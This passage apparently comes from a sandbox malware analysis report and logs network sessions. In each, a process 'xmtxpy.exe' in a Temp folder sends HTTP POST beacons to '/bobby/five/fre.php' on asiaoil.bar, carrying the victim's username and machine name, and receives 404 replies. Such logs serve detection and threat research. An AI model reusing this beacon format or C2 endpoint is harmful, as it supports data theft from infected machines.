                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:20.321175098 CET | 341 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:20.398272991 CET | 342 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QULp3ZlAMhwUjANw1YvL4%2BMJk9Z%2FbESFzhJWPA0iK5uawopHl0uiRldRAdRBGHJQS%2BTh9FZdQ4ZFWsS9QSIa12g5o6LPT8XtnzGfCgSERqmR9OTXY0oGiJOB7t3gug%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445bcfe999158-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        18 | 192.168.2.22 | 49183 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:21.371169090 CET | 342 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:21.387509108 CET | 343 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:21.466526985 CET | 343 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jiD84uKNL21I2ykVJEfn%2Fe2gpHIc0bS1RI%2FxuxHXAll6ytxzAqIMdpyZN%2FG8qWdDRDaJWS8n4CpPnVVPzZ%2BUtnIhRTImE9cuCSP7f%2BgqcZKxN4KBiYwynSKxXPUruQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445c39a1192b3-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        19 | 192.168.2.22 | 49184 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:22.490195036 CET | 344 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:22.506509066 CET | 345 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:22.588881016 CET | 345 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IYa8QLbJBtkMewci%2Fy3c8YjBFq4dsPE33C%2B67GR4NBQNLJZRdPOw48%2FtcUb%2BG8a9XxJsc%2FLHxAkXJbNtsVOHlmNJ8KgW%2BxJlAyE6l%2FjEcOW2fEoq4xgfX4aQ5RZPHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445ca9c095c5c-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        2 | 192.168.2.22 | 49167 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:02.840347052 CET | 314 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 176
                        Connection: close
                        Feb 10, 2022 10:22:02.856580973 CET | 314 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.ruAlbus704672ALBUS-PC+0DE4229FCF97F5879F50F8FD3dFvzt
                        Feb 10, 2022 10:22:02.975469112 CET | 315 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYIeoMifwVUCSlJ5xQ%2FPPGpv3kxeM8Le4fFZcBSBNQE%2F00nQuzz6hHD2E4yzDxCDvC4GoHGHI7XDrLhEy10sRiqxImrim07qG7zifuLYaSXjE11cVB6vD4NlHq2qFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4454fc86b917d-FRA
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        20 | 192.168.2.22 | 49185 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:23.504559040 CET | 346 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:23.520739079 CET | 346 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:23.595321894 CET | 347 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:23 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sM0ogIKfjYVzx%2F54CqSfhjTPc7gH6ECGRuTp6F6Pr791MX1PGLDWaUif41h1edR%2Bl8fsnqA1lYGZ15EqZyjj3xPhB0TdXiYdmWCIYNqlsiw0OjpK0OItnrzqYCRU8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445d0fcca9217-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        21 | 192.168.2.22 | 49186 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:24.588293076 CET | 348 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:24.604518890 CET | 348 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:24.674747944 CET | 349 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=16XyyasiijTs3mtooXtiXEBC3sVd%2FX3IpmrXnVgvAF7rYQXutsuLPMsIWRmqeVqbfgT1uHpXHgFEG6cA94%2Bl1vC5elQ%2F7riyngPQJHQv7Taa1Xkm5yxHj1vPsREEwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445d7baaa91f3-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        22 | 192.168.2.22 | 49187 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:25.593017101 CET | 350 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:25.609266043 CET | 350 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:25.698025942 CET | 351 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lZXOqBbo1prOUCtgEa8VHKBOX3aiUpw4bwcinIO5LwxwVfvhzB3YO83i0Uy1VUFZYvJDn%2BFVM2Qbb2QX9GH1gNr8iN7INb%2BqvuODkDJIVQrU84Oc3fT4Y6qVHDQFlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445ddfbe390f4-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        23 | 192.168.2.22 | 49188 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:26.671474934 CET | 351 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:26.687769890 CET | 352 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:26.773804903 CET | 352 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6CwJYTVGa3AnJcsAqL3zNlmjIgfexUkjM4cyDshIwsGRdfYIgN3bflXQh2onteNJ926X8WPY94crt1e3EfkgcxXiKtHHMa5TzW7hc2Hyll4xmtK3kqtsPyKPeb2HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445e4bcca91ed-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        24 | 192.168.2.22 | 49189 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:27.690156937 CET | 353 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:27.707482100 CET | 353 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:27.795358896 CET | 354 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:27 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFC3rc2PYyOGWitcWjhM03gTv0UwrpD%2FeLJzaq90%2BkjJJnsYFLs3%2B9G23tgPe1ch9t2Z3Xrks%2BoXkXgsLvtmsDrXa8JBOdIJfr6DqInywGS59STYxucek4Q2WmLQpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445eb1e9f9189-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        25 | 192.168.2.22 | 49190 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:29.085941076 CET | 355 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:29.102108955 CET | 355 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:29.188222885 CET | 356 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:29 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD7gJsujl0qEAxulzRwvTC2Sbt%2Bi4TFWvsjpt5CDloaVfn3Dt69l4iJM31MUngIv0nBezN298VraYSCFYdNpO%2FbJ4t7%2BWNOgx7HdyUwSUfBLC4eOt4PcY93RnkUHlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445f3db6a5b3e-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        26 | 192.168.2.22 | 49191 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:30.799654961 CET | 357 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:30.818408966 CET | 357 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:30.894473076 CET | 358 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:30 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvu1d3Vbzy6ZrTPTFWBGN7iEn1tx2RtWGRh2C76Vr5y%2B0NzzM1MCSCMy1A4AVEtbLBuKmRIr5zzqHNenni2AJ%2BwOtJJ179UjFozvWTm5cwFRvpN7D1tfeYfx%2FVlSLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445fe9dc491ed-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        27 | 192.168.2.22 | 49192 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:31.879954100 CET | 359 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:31.897677898 CET | 359 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:31.985625029 CET | 359 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7e4ivEN%2FfJbqg0IR30Nk7YLjE6R7gK9YQJH1DfEk3kbRoonUj0tMEraY%2BRjwLn7cP%2BNl78SF30VWW7AmBXj15TgGfudTHrRaK3bi%2FP7OjjFNWbyUKgOHiQu4SXY%2FXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446054d3a9274-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        28 | 192.168.2.22 | 49193 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:32.951127052 CET | 360 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:32.967331886 CET | 361 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:33.053421974 CET | 361 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WPprCDT9p343%2B%2BVa2BjaOyqYMB95UNCR5Ua%2FE%2FsZWRzD2F%2FUvoXHTkn2yAiBthKWkFusxeyRDME7Rpcj9nFv2dMiYrPffSB1GdxIUmMvBnBIuGG6eMWuphVFNIVyRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4460bfe8a9168-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        29 | 192.168.2.22 | 49194 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:34.006464005 CET | 362 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:34.022774935 CET | 362 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:34.138065100 CET | 363 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:34 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wShLmzxohhsviCUMQ%2FlqpiKLuE1FOqvf4YebS5qugs3Dzn05nwu27HDgM4qgHb10Sommq5Eo%2FITERtrckpOYW58EIm11S3Cxr5FX3Wb1wYzMe0KX2DB0%2FCIuyrBw%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4461298c49180-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        3 | 192.168.2.22 | 49168 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:03.831670046 CET | 316 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:03.848067045 CET | 316 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:03.955466986 CET | 317 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
